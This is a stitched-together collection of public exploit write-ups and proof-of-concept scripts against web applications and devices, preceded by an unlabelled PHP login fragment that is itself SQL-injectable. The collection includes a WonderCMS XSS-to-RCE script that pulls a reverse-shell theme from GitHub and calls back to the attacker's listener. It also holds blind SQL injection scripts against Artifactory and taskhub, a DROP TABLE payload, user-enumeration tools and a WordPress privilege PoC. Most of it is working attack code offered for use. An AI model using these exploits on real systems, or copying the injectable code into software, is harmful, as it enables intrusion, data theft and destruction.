Date date_default_timezone_set('Africa/Lagos'); $current_date = date('Y-m-d h:i:s'); $email = $_POST['txtemail']; $password = $_POST['txtpassword']; $status = 'Active'; $sql = "SELECT * FROM users WHERE email='" .$email. "' and password = '".$password."' and status = '".$status."'"; $result = mysqli_query($conn, $sql); if (mysqli_num_rows($result) > 0) { // output data of each row ($row = mysqli_fetch_assoc($result)); $_SESSION["email"] = $row['email']; $_SESSION["password"] = $row['password']; $_SESSION["phone"] = $row['phone']; $firstname = $row['firstname']; $_SESSION["firstname"] = $row['firstname']; $fa = $row['2FA']; }

# Exploit Title: SureMDM On-premise < 6.31 - CAPTCHA Bypass User Enumeration # Date: 05/12/2023 # Exploit Author: Jonas Benjamin Friedli # Vendor Homepage: https://www.42gears.com/products/mobile-device-management/ # Version: <= 6.31 # Tested on: 6.31 # CVE : CVE-2023-3897 import requests import sys def print_help(): print("Usage: python script.py [URL] [UserListFile]") sys.exit(1) def main(): if len(sys.argv) != 3 or sys.argv[1] == '-h': print_help() url, user_list_file = sys.argv[1], sys.argv[2] try: with open(user_list_file, 'r') as file: users = file.read().splitlines() except FileNotFoundError: print(f"User list file '{user_list_file}' not found.") sys.exit(1) valid_users = [] bypass_dir = "/ForgotPassword.aspx/ForgetPasswordRequest" enumerate_txt = "This User ID/Email ID is not registered." for index, user in enumerate(users): progress = (index + 1) / len(users) * 100 print(f"Processing {index + 1}/{len(users)} users ({progress:.2f}%)", end="\r") data = {"UserId": user} response = requests.post( f"{url}{bypass_dir}", json=data, headers={"Content-Type": "application/json; charset=utf-8"} ) if response.status_code == 200: response_data = response.json() if enumerate_txt not in response_data.get('d', {}).get('message', ''): valid_users.append(user) print("\nFinished processing users.") print(f"Valid Users Found: {len(valid_users)}") for user in valid_users: print(user) if __name__ == "__main__": main()

# Author: prodigiousMind # Exploit: Wondercms 4.3.2 XSS to RCE import sys import requests import os import bs4 if (len(sys.argv)<4): print("usage: python3 exploit.py loginURL IP_Address Port\nexample: python3 exploit.py http://localhost/wondercms/loginURL 192.168.29.165 5252") else: data = ''' var url = "'''+str(sys.argv[1])+'''"; if (url.endsWith("/")) { url = url.slice(0, -1); } var urlWithoutLog = url.split("/").slice(0, -1).join("/"); var urlWithoutLogBase = new URL(urlWithoutLog).pathname; var token = document.querySelectorAll('[name="token"]')[0].value; var urlRev = urlWithoutLogBase+"/?installModule=https://github.com/prodigiousMind/revshell/archive/refs/heads/main.zip&directoryName=violet&type=themes&token=" + token; var xhr3 = new XMLHttpRequest(); xhr3.withCredentials = true; xhr3.open("GET", urlRev); xhr3.send(); xhr3.onload = function() { if (xhr3.status == 200) { var xhr4 = new XMLHttpRequest(); xhr4.withCredentials = true; xhr4.open("GET", urlWithoutLogBase+"/themes/revshell-main/rev.php"); xhr4.send(); xhr4.onload = function() { if (xhr4.status == 200) { var ip = "'''+str(sys.argv[2])+'''"; var port = "'''+str(sys.argv[3])+'''"; var xhr5 = new XMLHttpRequest(); xhr5.withCredentials = true; xhr5.open("GET", urlWithoutLogBase+"/themes/revshell-main/rev.php?lhost=" + ip + "&lport=" + port); xhr5.send(); } }; } }; ''' try: open("xss.js","w").write(data) print("[+] xss.js is created") print("[+] execute the below command in another terminal\n\n----------------------------\nnc -lvp "+str(sys.argv[3])) print("----------------------------\n") XSSlink = str(sys.argv[1]).replace("loginURL","index.php?page=loginURL?")+"\"></form><script+src=\"http://"+str(sys.argv[2])+":8000/xss.js\"></script><form+action=\"" XSSlink = XSSlink.strip(" ") print("send the below link to admin:\n\n----------------------------\n"+XSSlink) print("----------------------------\n") print("\nstarting HTTP server to allow the access to xss.js") os.system("python3 -m http.server\n") except: print(data,"\n","//write this to a file")

# Exploit Title: artifactory low-privileged blind sql injection # Google Dork: # Date: # Exploit Author: ardr # Vendor Homepage:https://jfrog.com/help/r/jfrog-release-information/cve-2021-3860-artifactory-low-privileged-blind-sql-injection # Software Link: https://jfrog.com/help/r/jfrog-release-information/cve-2021-3860-artifactory-low-privileged-blind-sql-injection # Version: JFrog Artifactory prior to 7.25.4 # Tested on: MySQL # CVE : CVE-2021-3860 import requests, string, time from sys import stdout,exit import warnings from requests.packages.urllib3.exceptions import InsecureRequestWarning # written by 75fc58fa86778461771d2ff7f68b28259e97ece9bf6cd8be227c70e6a6140314c97d3fdac30b290c6b10d3679c5ba890635a1ca6fa23c83481dfc1257cd062fd # old script for CVE-2021-3860 # log into artifactory with any user. there must be populated data in the system. a fresh install will not work. # you will need to be able to capture a valid request to the below endpoint in order to run this script. # once captured, replace the cookies and headers below warnings.simplefilter('ignore',InsecureRequestWarning) session = requests.session() base = input("Please enter the base url: ") url = f"{base}/ui/api/v1/global-search/bundles/received?$no_spinner=true" # headers = Replace this with captured headers from the above endpoint pos = 1 # cookies = Replace this with captured cookies from the above endpoint while True: for i in string.digits + '.': data={"after": "", "before": "", "direction": "asc", "name": "*", "num_of_rows": 100, "order_by": f"(select*from(select((CASE WHEN (MID(VERSION(),{pos},1) = '{i}') THEN SLEEP(5) ELSE 4616 END)))a)"} start = time.time() r = session.post(url, headers=headers, cookies=cookies, json=data, verify=False) request_time = time.time() - start if request_time > 5: version += i pos += 1 stdout.write(i) stdout.flush() break if len(version) >= 6: stdout.write("\n") print(f"Version found: MySQL {version}") exit(0)

# Exploit Title: WEBIGniter v28.7.23 Stored Cross Site Scripting (XSS) # Exploit Author: Sagar Banwa # Date: 19/10/2023 # Vendor: https://webigniter.net/ # Software: https://webigniter.net/demo # Reference: https://portswigger.net/web-security/cross-site-scripting # Tested on: Windows 10/Kali Linux # CVE : CVE-2023-46391 Stored Cross-site scripting(XSS): Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Reflected XSS involves the reflecting of a malicious script off of a web application, onto a user's browser. Steps-To-Reproduce: 1. Login to the Account 2. Go to the Categories. 3. Now add catagory > Name section use payload : "><script>alert(1)</script> and choose layoutfile as cat.php Request POST /cms/categories/add HTTP/2 Host: demo.webigniter.net Cookie: ci_session=iq8k2mjlp2dg4pqa42m3v3dn2d4lmtjb; hash=6ROmvkMoHKviB4zypWJXmjIv6vhTQlFw6bdHlRjX User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 94 Origin: https://demo.webigniter.net Referer: https://demo.webigniter.net/cms/categories/add Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers name=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&slug=scriptalert1script&layout_file=cat.php

# Exploit Title: POC-CVE-2023-3244 # Date: 9/12/2023 # Exploit Author: Diaa Hanna # Software Link: [download link if available] # Version: <= 1.2.0 comments-like-dislike # Tested on: 1.1.6 comments-like-dislike # CVE : CVE-2023-3244 #References #https://nvd.nist.gov/vuln/detail/CVE-2023-3244 #The Comments Like Dislike plugin for WordPress has been found to have a vulnerability that allows unauthorized modification of data. This vulnerability arises due to a missing capability check on the restore_settings function, which is called through an AJAX action. The vulnerability affects versions up to and including 1.2.0 of the plugin. #This security flaw enables authenticated attackers with minimal permissions, such as subscribers, to reset the plugin's settings. It's important to note that this issue was only partially patched in version 1.2.0, as the nonce (a security measure) is still accessible to subscriber-level users. #For more detailed information about this bug, you can refer to the National Vulnerability Database (NVD) website at [CVE-2023-3244](https://nvd.nist.gov/vuln/detail/CVE-2023-3244). import requests import argparse import sys from colorama import Fore parser = argparse.ArgumentParser(prog='POC-CVE-2023-3244',description='This is a proof of concept for the CVE-2023-3244 it is an access control vulnerability in the restore_settings function ') parser.add_argument('-u','--username',help='username of a user on wordpress with low privileges',required=True) parser.add_argument('-p',"--password",help='password of a user on wordpress with low privileges',required=True) parser.add_argument('--url',help='the url of the vulnerable server (with http or https)',required=True) parser.add_argument('--nossl',help='disable ssl verification',action='store_true',required=False,default=False) args=parser.parse_args() #check if the domain ends with a '/' if not then add it url=args.url if url[-1] != '/': url+='/' wp_login = f'{url}wp-login.php' wp_admin = f'{url}wp-admin/' username = args.username password = args.password session=requests.Session() #logging in session.post(wp_login, headers={'Cookie':'wordpress_test_cookie=WP Cookie check'}, data={'log':username, 'pwd':password, 'wp-submit':'Log In', 'redirect_to':wp_admin, 'testcookie':'1' },verify=not (args.nossl)) #if failed to login if len(session.cookies.get_dict()) == 2: print(Fore.RED +"Error Logging In Check Your Username and Password And Try Again") sys.exit(1) #making the ajax request to wp_ajax_cld_settings_restore_action this line will call the restore_settings function #the restore_settings function does not check the sufficient privileges of a logged-in user #even a subscriber can use this POC response=session.get(f"{wp_admin}/admin-ajax.php?action=cld_settings_restore_action",verify=not (args.nossl)) if response.text == "Settings restored successfully.Redirecting...": print(Fore.GREEN +"exploited excuted successfully") print(Fore.YELLOW+ "settings of the comments-like-dislike plugin should be defaulted on the server") sys.exit(0) else: print(Fore.RED + "some error occurred please read the source code of the poc it isn't that long anyway") sys.exit(1)

# Exploit Title: Simple Inventory Management System v1.0 - 'email' SQL Injection # Google Dork: N/A # Application: Simple Inventory Management System # Date: 26.02.2024 # Bugs: SQL Injection # Exploit Author: SoSPiro # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/15419/simple-inventory-management-system-phpoop-free-source-code.html # Version: 1.0 # Tested on: Windows 10 64 bit Wampserver # CVE : N/A ## Vulnerability Description: This code snippet is potentially vulnerable to SQL Injection. User inputs ($_POST['email'] and $_POST['pwd']) are directly incorporated into the SQL query without proper validation or sanitization, exposing the application to the risk of manipulation by malicious users. This could allow attackers to inject SQL code through specially crafted input. ## Proof of Concept (PoC): An example attacker could input the following values: email: [email protected]'%2b(select*from(select(sleep(20)))a)%2b' pwd: test This would result in the following SQL query: SELECT * FROM users WHERE email = '[email protected]'+(select*from(select(sleep(20)))a)+'' AND password = 'anything' This attack would retrieve all users, making the login process always successful. request-response foto:https://i.imgur.com/slkzYJt.png ## Vulnerable code section: ==================================================== ims/login.php <?php ob_start(); session_start(); include('inc/header.php'); $loginError = ''; if (!empty($_POST['email']) && !empty($_POST['pwd'])) { include 'Inventory.php'; $inventory = new Inventory(); // Vulnerable code $login = $inventory->login($_POST['email'], $_POST['pwd']); // if(!empty($login)) { $_SESSION['userid'] = $login[0]['userid']; $_SESSION['name'] = $login[0]['name']; header("Location:index.php"); } else { $loginError = "Invalid email or password!"; } } ?> ## Reproduce: https://packetstormsecurity.com/files/177294/Simple-Inventory-Management-System-1.0-SQL-Injection.html

# Exploit Title: taskhub 2.8.7 - SQL Injection # Exploit Author: CraCkEr # Date: 05/09/2023 # Vendor: Infinitie Technologies # Vendor Homepage: https://www.infinitietech.com/ # Software Link: https://codecanyon.net/item/taskhub-project-management-finance-crm-tool/25685874 # Demo: https://taskhub.company/auth # Tested on: Windows 10 Pro # Impact: Database Access # CVE: CVE-2023-4987 # CWE: CWE-89 - CWE-74 - CWE-707 ## Greetings The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob ## Description SQL injection attacks can allow unauthorized access to sensitive data, modification of data and crash the application or make it unavailable, leading to lost revenue and damage to a company's reputation. Path: /home/get_tasks_list GET parameter 'project' is vulnerable to SQL Injection GET parameter 'status' is vulnerable to SQL Injection GET parameter 'user_id' is vulnerable to SQL Injection GET parameter 'sort' is vulnerable to SQL Injection GET parameter 'search' is vulnerable to SQL Injection https://taskhub.company/home/get_tasks_list?project=[SQLi]&status=[SQLi]&from=&to=&workspace_id=1&user_id=[SQLi]&is_admin=&limit=10&sort=[SQLi]&order=&offset=0&search=[SQLi] --- Parameter: project (GET) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (query SLEEP) Payload: project='XOR(SELECT(0)FROM(SELECT(SLEEP(8)))a)XOR'Z&status=&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=id&order=desc&offset=0&search= Parameter: status (GET) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (query SLEEP) Payload: project=&status='XOR(SELECT(0)FROM(SELECT(SLEEP(8)))a)XOR'Z&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=id&order=desc&offset=0&search= Parameter: user_id (GET) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (query SLEEP) Payload: project=&status=&from=&to=&workspace_id=1&user_id=(SELECT(0)FROM(SELECT(SLEEP(8)))a)&is_admin=&limit=10&sort=id&order=desc&offset=0&search= Parameter: sort (GET) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (query SLEEP) Payload: project=&status=&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=(SELECT(0)FROM(SELECT(SLEEP(6)))a)&order=desc&offset=0&search= Parameter: search (GET) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (query SLEEP) Payload: project=&status=&from=&to=&workspace_id=1&user_id=23&is_admin=&limit=10&sort=id&order=desc&offset=0&search=') AND (SELECT(0)FROM(SELECT(SLEEP(7)))a)-- wXyW --- [-] Done

# Exploit Title: Online Shopping System Advanced # Date: 07.12.2023 # Exploit Author: Furkan Gedik # Vendor Homepage: https://github.com/PuneethReddyHC/online-shopping-system-advanced # Software Link: https://github.com/PuneethReddyHC/online-shopping-system-advanced # Version: 1.0 # Tested on: [Kali Linux 2020.3] # Description Unauthorized access to a database by injecting malicious SQL statements. The SQL injection vulnerability occurs due to the inclusion of the user-provided "cm" parameter in the SQL query without proper filtering or sanitization. An attacker can exploit the vulnerability by injecting malicious SQL code in the "cm" parameter. Successful exploitation of the vulnerability results in the disclosure of sensitive information from the database, such as user credentials, which can be used to gain unauthorized access to the database. # PoC [+] sqlmap output sqlmap.py -u "http://localhost/online-shopping-system-advanced/payment_success.php?st=Completed&cm=1" -p cm --dbms=mysql -technique=T --proxy=http://127.0.0.1:8080 Parameter: cm (GET) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: st=Completed&cm=1' AND (SELECT 1415 FROM (SELECT(SLEEP(5)))NRHH) AND 'jLpV'='jLpV # Vulnerability https://github.com/PuneethReddyHC/online-shopping-system-advanced/blob/master/payment_success.php#L12-L22 [+] payment_success.php if (isset($_GET["st"])) { # code... $trx_id = $_GET["tx"]; $p_st = $_GET["st"]; $amt = $_GET["amt"]; $cc = $_GET["cc"]; $cm_user_id = $_GET["cm"]; $c_amt = $_COOKIE["ta"]; if ($p_st == "Completed") { include_once("db.php"); $sql = "SELECT p_id,qty FROM cart WHERE user_id = '$cm_user_id'";

# Exploit Title: Flashcard Quiz App v1.0 - 'card' SQL Injection # Google Dork: N/A # Application: Flashcard Quiz App # Date: 25.02.2024 # Bugs: SQL Injection # Exploit Author: SoSPiro # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/17160/flashcard-quiz-app-using-php-and-mysql-source-code.html # Version: 1.0 # Tested on: Windows 10 64 bit Wampserver # CVE : N/A ## Vulnerability Description: The provided PHP code is vulnerable to SQL injection. SQL injection occurs when user inputs are directly concatenated into SQL queries without proper sanitization, allowing an attacker to manipulate the SQL query and potentially perform unauthorized actions on the database. ## Proof of Concept (PoC): This vulnerability involves injecting malicious SQL code into the 'card' parameter in the URL. 1. Original Code: $card = $_GET['card']; $query = "DELETE FROM tbl_card WHERE tbl_card_id = '$card'"; 2. Payload: ' OR '1'='1'; SELECT IF(VERSION() LIKE '8.0.31%', SLEEP(5), 0); -- 3. Injected Query: DELETE FROM tbl_card WHERE tbl_card_id = '' OR '1'='1'; SELECT IF(VERSION() LIKE '8.0.31%', SLEEP(5), 0); -- Request Response foto: https://i.imgur.com/5IXvpiZ.png ## Vulnerable code section: ==================================================== endpoint/delete-flashcard.php $card = $_GET['card']; $query = "DELETE FROM tbl_card WHERE tbl_card_id = '$card'";

# Exploit Title: FAQ Management System v1.0 - 'faq' SQL Injection # Google Dork: N/A # Application: FAQ Management System # Date: 25.02.2024 # Bugs: SQL Injection # Exploit Author: SoSPiro # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/17175/faq-management-system-using-php-and-mysql-source-code.html # Version: 1.0 # Tested on: Windows 10 64 bit Wampserver # CVE : N/A ## Vulnerability Description: The provided code is vulnerable to SQL injection. The vulnerability arises from directly using user input ($_GET['faq']) in the SQL query without proper validation or sanitization. An attacker can manipulate the 'faq' parameter to inject malicious SQL code, leading to unintended and potentially harmful database operations. ## Proof of Concept (PoC): An attacker can manipulate the 'faq' parameter to perform SQL injection. For example: 1. Original Request: http://example.com/endpoint/delete-faq.php?faq=123 2.Malicious Request (SQL Injection): http://example.com/endpoint/delete-faq.php?faq=123'; DROP TABLE tbl_faq; -- This would result in a query like: DELETE FROM tbl_faq WHERE tbl_faq_id = '123'; DROP TABLE tbl_faq; -- Which can lead to the deletion of data or even the entire table. poc foto: https://i.imgur.com/1IENYFg.png ## Vulnerable code section: ==================================================== endpoint/delete-faq.php $faq = $_GET['faq']; // ... $query = "DELETE FROM tbl_faq WHERE tbl_faq_id = '$faq'";

[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_ACCOUNT_ENUMERATION_CVE-2024-25734.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.wyrestorm.com [Product] APOLLO VX20 < 1.3.58 [Vulnerability Type] Account Enumeration [CVE Reference] CVE-2024-25734 [Security Issue] An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. The TELNET service prompts for a password only after a valid username is entered. Attackers who can reach the Apollo VX20 Telnet service can determine valid accounts, this can potentially allow for brute force attack on a valid account. [Exploit/POC] TELNET x.x.x.x 23 username:aa username:bb username:admin password: [Network Access] Remote [Affected Product Code Base] APOLLO VX20 - < 1.3.58, fixed in v1.3.58 [Severity] Medium [Disclosure Timeline] Vendor Notification: January 18, 2024 Vendor released fixed firmware v1.3.58: February 2, 2024 February 11, 2024 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx